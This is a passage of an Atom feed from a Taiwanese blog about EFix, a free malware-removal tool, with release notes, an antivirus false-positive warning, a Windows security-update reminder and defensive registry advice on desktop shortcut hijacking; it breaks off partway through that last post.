<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-8908869217529416382</id><updated>2011-11-24T13:55:38.152+08:00</updated><category term='EF'/><category term='閒聊'/><category term='系統'/><category term='毒駭防護'/><title type='text'>EFix 台灣較常見惡意程式清除工具.</title><subtitle type='html'>隨身碟病毒清除程式？ 也算啦...那只是他其中一個功能而已</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://reinfors.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default?start-index=101&amp;max-results=100'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>127</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-6668546451611681376</id><published>2011-01-22T08:31:00.000+08:00</published><updated>2011-01-22T08:31:03.886+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFIX 5.7 20110122.01</title><content type='html'>版本：5.7 20110122.01&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;File size : 1538547 bytes&lt;br /&gt;&lt;br /&gt;MD5 &amp;nbsp; : 8598ed99661c3cb8634da209a1982951&lt;br /&gt;SHA1 &amp;nbsp;: 83ae4f1293add158ef76c5f08dfad385d97ade85&lt;br /&gt;SHA256: 21bf6bd955101bc6f7fab9031e2ab1aa7891989659436a6b16754e4da2a7bf6f&lt;br /&gt;&lt;br /&gt;測試過的作業系統：&lt;br /&gt;Windows XP SP3&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;增加刪除檔案&lt;br /&gt;&lt;br /&gt;好久沒碰了...突然覺得做這東西好像沒收益就沒動力想去做0rz&lt;br /&gt;果然還是年紀大了...&lt;br /&gt;不過這個是不可能收費的就是。&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-6668546451611681376?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/6668546451611681376'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/6668546451611681376'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2011/01/efix-57-2011012201.html' title='EFIX 5.7 20110122.01'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-3528270105427161069</id><published>2010-12-01T12:04:00.000+08:00</published><updated>2010-12-01T12:04:34.488+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFIX 5.7 20101130.03</title><content type='html'>版本：5.7 20101130.03&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;&lt;br /&gt;MD5 &amp;nbsp; : 4dcc4191a749f2e6915ecd3d0fda7360&lt;br /&gt;SHA1 &amp;nbsp;: 273396e2cbcdeac22c4a456ca1e276d6aca97fc0&lt;br /&gt;SHA256: fb638ee241032d86495f73cc35ca7efd557fddee5193208d72f41ac063941216&lt;br /&gt;&lt;br /&gt;測試過的作業系統：&lt;br /&gt;Windows 7 x86&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;增加刪除檔案&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-3528270105427161069?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/3528270105427161069'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/3528270105427161069'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/12/efix-57-2010113003.html' title='EFIX 5.7 20101130.03'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-1057886406750931651</id><published>2010-11-19T11:29:00.000+08:00</published><updated>2010-11-19T11:29:07.404+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='系統'/><title type='text'>底下那篇只是測試OPERA相容性用的</title><content type='html'>因為又看到很久沒在用的OPERA所以在裝起來使用看看&lt;br /&gt;結果表現還是和以前一樣非常好&lt;br /&gt;&lt;br /&gt;以前放棄的原因是因為在一些編輯網頁上面會有相容性問題，這個BLOG就是&lt;br /&gt;所以只能放棄&lt;br /&gt;&lt;br /&gt;不過似乎有改善了，可能再多用幾天看看&lt;br /&gt;&lt;br /&gt;OPERA是一種瀏覽器，好處是瀏覽速度快以及內建的強大功能&lt;br /&gt;可參閱官網：&lt;a href="http://www.opera.com/"&gt;OPERA&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;同時也可使用台灣人製作的工具整合包，使用體驗會更好&lt;br /&gt;請參閱：&lt;a href="http://jedi.org/opera/news.html#006042"&gt;三太子計畫&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-1057886406750931651?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/1057886406750931651'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/1057886406750931651'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/11/opera.html' title='底下那篇只是測試OPERA相容性用的'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-6423448184331313106</id><published>2010-11-19T10:53:00.000+08:00</published><updated>2010-11-19T10:53:49.832+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='閒聊'/><title type='text'>TEST用</title><content type='html'>TEST 123456789&lt;br /&gt;&lt;span style="color: red;"&gt;TEST 234567890&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_XPrN8EVFxI4/Sgz-nyHMIQI/AAAAAAAAARY/B0a0So9a3Ww/s1600/sysrestore08.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/_XPrN8EVFxI4/Sgz-nyHMIQI/AAAAAAAAARY/B0a0So9a3Ww/s1600/sysrestore08.JPG" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;456789&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-6423448184331313106?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/6423448184331313106'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/6423448184331313106'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/11/test.html' title='TEST用'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_XPrN8EVFxI4/Sgz-nyHMIQI/AAAAAAAAARY/B0a0So9a3Ww/s72-c/sysrestore08.JPG' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-3530403250317837024</id><published>2010-11-18T15:06:00.000+08:00</published><updated>2010-11-18T15:06:23.655+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFIX 5.7 20101118.05</title><content type='html'>版本：5.7 20101118.05&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;&lt;br /&gt;MD5 &amp;nbsp; : 9d6451ddda616636cd26a61254de6b06&lt;br /&gt;SHA1 &amp;nbsp;: 46fdd3c6af0fefcfcdd6882c53d59018b11e8ff7&lt;br /&gt;SHA256: 427bd2c0e3a0cf17204186604d0047596b9d798e3402f609883954444ff26e0b&lt;br /&gt;&lt;br /&gt;測試過的作業系統：&lt;br /&gt;Windows 7 X86&lt;br /&gt;Windows XP SP3&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;修正可能誤刪除CMD.EXE的問題&lt;br /&gt;修改部分刪除檔案清單避開部分病毒自爆情形&lt;br /&gt;增加刪除檔案 (TWKING.EXE TWKING0.DLL - TWKING9.DLL)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-3530403250317837024?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/3530403250317837024'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/3530403250317837024'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/11/efix-57-2010111805.html' title='EFIX 5.7 20101118.05'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-3761621457810262089</id><published>2010-10-16T12:23:00.000+08:00</published><updated>2010-10-16T12:23:04.721+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix 5.7 20101016.04</title><content type='html'>版本：5.7 20101016.04&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;File size&amp;nbsp;:&amp;nbsp;1538337 bytes&lt;br /&gt;MD5 &amp;nbsp; : fcd184800feeb4d5e2cb4b75943667c3&lt;br /&gt;SHA1 &amp;nbsp;: c3e2a5970da5d3f30b1db9e11462aeffd602a18f&lt;br /&gt;&lt;br /&gt;測試過的作業系統：&lt;br /&gt;Windows 7 x86 旗艦版&lt;br /&gt;WIndows XP SP2 SP3&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;增加當系統偵測到需要做IE部分設定值重置時會提示，按是才會動。(如果是使用自訂腳本IERESET::時就不會跳出直接重置)&lt;br /&gt;增加一點刪除檔案&lt;br /&gt;修改部分小錯誤&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-3761621457810262089?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/3761621457810262089'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/3761621457810262089'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/10/efix-57-2010101604.html' title='EFix 5.7 20101016.04'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-1219794269916702875</id><published>2010-10-06T23:24:00.000+08:00</published><updated>2010-10-06T23:24:12.881+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><category scheme='http://www.blogger.com/atom/ns#' term='系統'/><title type='text'>NOD32的誤判..</title><content type='html'>所以才說要對系統有一個程度的了解...&lt;br /&gt;&lt;br /&gt;NOD32今天的更新會將WINDOWS XP的IMM32.DLL誤判為木馬&lt;br /&gt;這檔不管隔離，刪除或不管他都會造成系統近乎崩潰的情形&lt;br /&gt;&lt;br /&gt;請先行將IMM32.DLL加入到忽略清單內等NOD32病毒碼有更新之後再清除掉&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-1219794269916702875?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/1219794269916702875'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/1219794269916702875'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/10/nod32.html' title='NOD32的誤判..'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-702899582208834154</id><published>2010-10-06T01:00:00.000+08:00</published><updated>2010-10-06T01:00:46.342+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='閒聊'/><title type='text'>好久沒碰這東西了...</title><content type='html'>最近一段時間真的是很忙&lt;br /&gt;加上因為新買了手機所以重心都沒放在這邊&lt;br /&gt;&lt;br /&gt;加上也沒有特別需要做處理的惡意程式&lt;br /&gt;所以就都沒有再更新&lt;br /&gt;&lt;br /&gt;結果今天犧牲一點中午時間看了一下原碼發現又看不懂了...0rz&lt;br /&gt;太久沒碰...&lt;br /&gt;&lt;br /&gt;不過目前是真的沒有甚麼特別需要新增的東西&lt;br /&gt;可能最近會做的變動為增加一個提示&lt;br /&gt;讓沒有使用自訂腳本但IE首頁要重置時跳個提示通知&lt;br /&gt;&lt;br /&gt;不然其實不少人在首頁設置上面其實有被惡意修改但是沒有顯示出來&lt;br /&gt;結果EFIX直接就給他修下去造成認為是有問題&lt;br /&gt;這樣就不好了....&lt;br /&gt;&lt;br /&gt;如果最近沒有特別比較流行的東西的話&lt;br /&gt;大概就是增加這東西而已&lt;br /&gt;&lt;br /&gt;現在也沒甚麼動力去處理這東西0rz&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-702899582208834154?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/702899582208834154'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/702899582208834154'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/10/blog-post.html' title='好久沒碰這東西了...'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-8540257782770114390</id><published>2010-08-31T00:16:00.001+08:00</published><updated>2010-08-31T00:32:16.482+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFix 5.7 20100830.03</title><content type='html'>版本：5.7 20100830.03&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;MD5 &amp;nbsp; : 2d50a2a57eacb63f09f3ed96872a5f1f&lt;br /&gt;SHA1 &amp;nbsp;: dc50c6085bd45f50603ac62b81d81851b3204f1b&lt;br /&gt;SHA256: cc3409607bd1118f89a02f278b7c3090653c5cffb64b240fdfcc918a92f4ef8c&lt;br /&gt;&lt;br /&gt;測試過的作業系統：&lt;br /&gt;Windows XP SP3&lt;br /&gt;Windows 7 x86中文旗艦版&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;增加刪除檔案&lt;br /&gt;&lt;br /&gt;備註：&lt;br /&gt;這一次本來還是沒有想要特別放上來的&lt;br /&gt;不過因為看到POST病毒有變種 ( KAVO系列不知道便幾次種的變種 )，現在改名叫WOWST.EXE還有WOWST0.DLL (0-9) 的樣子 ( 沒收到樣本，但有看到報告顯示一看就知道了... )&lt;br /&gt;所以就另外加到刪除清單內並且發佈.&lt;br /&gt;&lt;br /&gt;最近時間真的少...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-8540257782770114390?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/8540257782770114390'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/8540257782770114390'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/08/efix-57-2010083003.html' title='EFix 5.7 20100830.03'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-5938297295569031029</id><published>2010-08-11T20:03:00.000+08:00</published><updated>2010-08-11T20:03:33.485+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><title type='text'>EFix 5.7 20100811.04</title><content type='html'>版本：5.7 20100811.04&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;&lt;br /&gt;MD5 &amp;nbsp; : 36dc2fe48a5babaf1972f3333aafe93e&lt;br /&gt;SHA1 &amp;nbsp;: 37673010e94b09b6786a541e639bd3d5d3fc6676&lt;br /&gt;SHA256: 0e296f6d18448d2c114508ef4ad70c6c2cb09443f564c8bc85e2a8c569565f89&lt;br /&gt;&lt;br /&gt;測試過的作業系統：&lt;br /&gt;Windows 7 x86&lt;br /&gt;Windows XP SP2&lt;br /&gt;Windows XP SP3&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;修正每次執行都會將首頁修改成GOOGLE和一定要求重開機的問題&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-5938297295569031029?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/5938297295569031029'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/5938297295569031029'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/08/efix-57-2010081104.html' title='EFix 5.7 20100811.04'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-144285817488836631</id><published>2010-08-10T14:20:00.000+08:00</published><updated>2010-08-10T14:20:26.663+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EF'/><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><title type='text'>EFIX 5.7 20100810.03</title><content type='html'>版本：5.7 20100810.03&lt;br /&gt;&lt;br /&gt;檔案資訊：&lt;br /&gt;&lt;br /&gt;File size: 1538270 bytes&lt;br /&gt;MD5...: a6f1d0b14598c6eb2b889c3fc793a454&lt;br /&gt;SHA1..: 5ee875f5d5ad8819c015f861a2625af895422721&lt;br /&gt;&lt;br /&gt;測試過的作業系統：&lt;br /&gt;Windows 7 x86 旗艦版&lt;br /&gt;Windows XP SP3&lt;br /&gt;&lt;br /&gt;修改事項：&lt;br /&gt;增加一點刪除檔案&lt;br /&gt;修一點報告版面&lt;br /&gt;加強預設腳本處裡首頁綁架的能力&lt;br /&gt;新增自訂腳本指令DEL JOBS::，用來刪除工作排程檔的&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-144285817488836631?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/144285817488836631'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/144285817488836631'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/08/efix-57-2010081003.html' title='EFIX 5.7 20100810.03'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-2572538140940994860</id><published>2010-08-03T10:31:00.000+08:00</published><updated>2010-08-03T10:31:05.537+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><category scheme='http://www.blogger.com/atom/ns#' term='系統'/><title type='text'>微軟重大安全性更新 KB2286198</title><content type='html'>在&lt;a href="http://reinfors.blogspot.com/2010/07/blog-post_22.html"&gt;這一篇&lt;/a&gt;所提到的新攻擊手法，今天微軟發出了安全性更新通知&lt;br /&gt;&lt;div&gt;請各位務必去更新此項安全性更新。&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;/div&gt;&lt;div&gt;微軟安全性更新通告：&lt;a href="http://www.microsoft.com/technet/security/bulletin/MS10-046.mspx"&gt;MS10-046&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;請注意如果你系統是WINDOWS XP，並且是在SERVICES PARK2以前的版本&lt;br /&gt;請先更新至WINDOWS XP SERVICES PARK3，現在微軟已經停止對SP3以前版本的後續支援，對於一些這種比較重大的安全性更新會比較吃虧一些.所以還沒更新的人趕快去更新吧。&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8908869217529416382-2572538140940994860?l=reinfors.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/2572538140940994860'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8908869217529416382/posts/default/2572538140940994860'/><link rel='alternate' type='text/html' href='http://reinfors.blogspot.com/2010/08/kb2286198.html' title='微軟重大安全性更新 KB2286198'/><author><name>Junorn</name><uri>http://www.blogger.com/profile/10571034328041203880</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8908869217529416382.post-4115628827921486285</id><published>2010-07-29T15:03:00.000+08:00</published><updated>2010-07-29T15:03:16.273+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='毒駭防護'/><category scheme='http://www.blogger.com/atom/ns#' term='系統'/><title type='text'>[新聞] 中國變種木馬 綁架桌面捷徑</title><content type='html'>會貼這篇是因為要有看到這篇的人不要照這新聞的方式去做&lt;br /&gt;&lt;br /&gt;首先新聞連結於此：&lt;a href="http://tw.news.yahoo.com/article/url/d/a/100729/78/2a3og.html"&gt;新聞連結&lt;/a&gt;&lt;br /&gt;這邊上面提到的先不管&lt;br /&gt;這邊要注意的是後面提到的解決方式&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;趨勢科技也提供修復方式，網友可在「附屬應用程式」中找到「執行」，輸入「regedit」，按下「編輯--&amp;gt;;尋找」，輸入被綁架前往的目的網址，找到左方相對應的CLSID值；之後，再「編輯--&amp;gt;;尋找」，輸入CLSID值，將搜尋到的登錄值全數刪除，即大功告成。&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;這邊真的不知道該怎麼說...0rz&lt;br /&gt;一般來說桌面上所產生的捷徑如果按右鍵沒有刪除這一個選項的話&lt;br /&gt;那大多都是使用CLSID所產生出來的沒錯，那東西不是檔案&lt;br /&gt;&lt;br /&gt;一般作法也是刪除CLSID數值沒錯，但刪除的重點並不是整個刪除...&lt;br /&gt;先假設數值為&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;HKEY_CLASSES_ROOT\CLSID\{00000000-1111-2222-3333-000000000000}\SHELL\開啟(O&amp;amp;)\Command&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;底下的數值為(預設值) REG_SZ "C:\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE" "http://www.綁架位置.com"&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;這一段是可以很明顯看到有問題&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;但刪除要怎麼刪？&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;首先先找&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;{00000000-1111-2222-3333-000000000000}數值本身是不是正常的數值&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;怎麼找？ GOOGLE很好用的...&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;假設一找下去完全沒有任何資料&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;那就可以直接刪除&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;HKEY_CLASSES_ROOT\CLSID\{00000000-1111-2222-3333-000000000000}這一整段&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;並到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace這邊去找&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;{00000000-1111-2222-3333-000000000000}這一個值將他刪除&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;那假設找到的資料是正常值呢？&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;現在假設改成&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;HKEY_CLASSES_ROOT\CLSID\&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;{e17d4fc0-5564-11d1-83f2-00a0c90dc849}&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;\SHELL\開啟(O&amp;amp;)\Command&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;這一個&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;{e17d4fc0-5564-11d1-83f2-00a0c90dc849}數&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;值原本是正常的CLSID，是WINDOWS XP在使用的搜尋功能相關數值&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;假設照上面所說的直接將&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;HKEY_CLASSES_ROOT\CLSID\&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;{e17d4fc0-5564-11d1-83f2-00a0c90dc849}整段刪除後&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" 